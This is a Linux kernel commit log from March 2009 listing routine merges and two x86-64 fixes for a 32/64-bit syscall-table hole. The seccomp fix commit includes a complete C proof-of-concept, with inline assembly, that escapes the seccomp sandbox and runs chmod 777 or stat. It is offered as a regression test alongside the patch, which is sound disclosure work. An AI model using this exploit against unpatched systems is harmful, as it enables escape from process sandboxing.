1. 02 Mar, 2009 6 commits
    • Karsten Keil's avatar
      Change email address · fbfd8b56
      Karsten Keil authored
      Since I will loose the old address soon, please change it.
      Signed-off-by: default avatarKarsten Keil <kkeil@linux-pingi.de>
      Signed-off-by: default avatarLinus Torvalds <torvalds@linux-foundation.org>
      fbfd8b56
    • Linus Torvalds's avatar
      Merge branch 'for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/dtor/input · 6b3bf204
      Linus Torvalds authored
      * 'for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/dtor/input:
        Input: elantech - touchpad driver miss-recognising logitech mice
        Input: synaptics - ensure we reset the device on resume
        Input: usbtouchscreen - fix eGalax HID ignoring
        Input: ambakmi - fix timeout handling in amba_kmi_write()
        Input: pxa930_trkball - fix write timeout handling
        Input: struct device - replace bus_id with dev_name(), dev_set_name()
        Input: bf54x-keys - fix debounce time validation
        Input: spitzkbd - mark probe function as __devinit
        Input: omap-keypad - mark probe function as __devinit
        Input: corgi_ts - mark probe function as __devinit
        Input: corgikbd - mark probe function as __devinit
        Input: uvc - the button on the camera is KEY_CAMERA
        Input: psmouse - make MOUSE_PS2_LIFEBOOK depend on X86
        Input: atkbd - make forced_release_keys[] static
        Input: usbtouchscreen - allow reporting calibrated data
      6b3bf204
    • Linus Torvalds's avatar
      Merge branch 'for_linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tytso/ext4 · 36b31106
      Linus Torvalds authored
      * 'for_linus' of git://git.kernel.org/pub/scm/linux/kernel/git/tytso/ext4:
        ext4: don't call jbd2_journal_force_commit_nested without journal
        ext4: Reorder fs/Makefile so that ext2 root fs's are mounted using ext2
        ext4: Remove duplicate call to ext4_commit_super() in ext4_freeze()
      36b31106
    • Linus Torvalds's avatar
      Merge git://git.kernel.org/pub/scm/linux/kernel/git/jejb/scsi-rc-fixes-2.6 · 7b88ed67
      Linus Torvalds authored
      * git://git.kernel.org/pub/scm/linux/kernel/git/jejb/scsi-rc-fixes-2.6:
        [SCSI] mpt: fix disable lsi sas to use msi as default
        [SCSI] fix ABORTED_COMMAND looping forever problem
        [SCSI] sd: revive sd_index_lock
        [SCSI] cxgb3i: update the driver version to 1.0.1
        [SCSI] cxgb3i: Fix spelling errors in documentation
        [SCSI] cxgb3i: added missing include in cxgb3i_ddp.h
        [SCSI] cxgb3i: Outgoing pdus need to observe skb's MAX_SKB_FRAGS
        [SCSI] cxgb3i: added per-task data to track transmit progress
        [SCSI] cxgb3i: transmit work-request fixes
        [SCSI] hptiop: Add new PCI device ID
      7b88ed67
    • Roland McGrath's avatar
      x86-64: seccomp: fix 32/64 syscall hole · 5b101740
      Roland McGrath authored
      On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
      ljmp, and then use the "syscall" instruction to make a 64-bit system
      call.  A 64-bit process make a 32-bit system call with int $0x80.
      
      In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
      the wrong system call number table.  The fix is simple: test TS_COMPAT
      instead of TIF_IA32.  Here is an example exploit:
      
      	/* test case for seccomp circumvention on x86-64
      
      	   There are two failure modes: compile with -m64 or compile with -m32.
      
      	   The -m64 case is the worst one, because it does "chmod 777 ." (could
      	   be any chmod call).  The -m32 case demonstrates it was able to do
      	   stat(), which can glean information but not harm anything directly.
      
      	   A buggy kernel will let the test do something, print, and exit 1; a
      	   fixed kernel will make it exit with SIGKILL before it does anything.
      	*/
      
      	#define _GNU_SOURCE
      	#include <assert.h>
      	#include <inttypes.h>
      	#include <stdio.h>
      	#include <linux/prctl.h>
      	#include <sys/stat.h>
      	#include <unistd.h>
      	#include <asm/unistd.h>
      
      	int
      	main (int argc, char **argv)
      	{
      	  char buf[100];
      	  static const char dot[] = ".";
      	  long ret;
      	  unsigned st[24];
      
      	  if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
      	    perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");
      
      	#ifdef __x86_64__
      	  assert ((uintptr_t) dot < (1UL << 32));
      	  asm ("int $0x80 # %0 <- %1(%2 %3)"
      	       : "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
      	  ret = snprintf (buf, sizeof buf,
      			  "result %ld (check mode on .!)\n", ret);
      	#elif defined __i386__
      	  asm (".code32\n"
      	       "pushl %%cs\n"
      	       "pushl $2f\n"
      	       "ljmpl $0x33, $1f\n"
      	       ".code64\n"
      	       "1: syscall # %0 <- %1(%2 %3)\n"
      	       "lretl\n"
      	       ".code32\n"
      	       "2:"
      	       : "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
      	  if (ret == 0)
      	    ret = snprintf (buf, sizeof buf,
      			    "stat . -> st_uid=%u\n", st[7]);
      	  else
      	    ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
      	#else
      	# error "not this one"
      	#endif
      
      	  write (1, buf, ret);
      
      	  syscall (__NR_exit, 1);
      	  return 2;
      	}
      Signed-off-by: default avatarRoland McGrath <roland@redhat.com>
      [ I don't know if anybody actually uses seccomp, but it's enabled in
        at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]
      Signed-off-by: default avatarLinus Torvalds <torvalds@linux-foundation.org>
      5b101740
    • Roland McGrath's avatar
      x86-64: syscall-audit: fix 32/64 syscall hole · ccbe495c
      Roland McGrath authored
      On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
      ljmp, and then use the "syscall" instruction to make a 64-bit system
      call.  A 64-bit process make a 32-bit system call with int $0x80.
      
      In both these cases, audit_syscall_entry() will use the wrong system
      call number table and the wrong system call argument registers.  This
      could be used to circumvent a syscall audit configuration that filters
      based on the syscall numbers or argument details.
      Signed-off-by: default avatarRoland McGrath <roland@redhat.com>
      Signed-off-by: default avatarLinus Torvalds <torvalds@linux-foundation.org>
      ccbe495c
  2. 28 Feb, 2009 25 commits
  3. 27 Feb, 2009 9 commits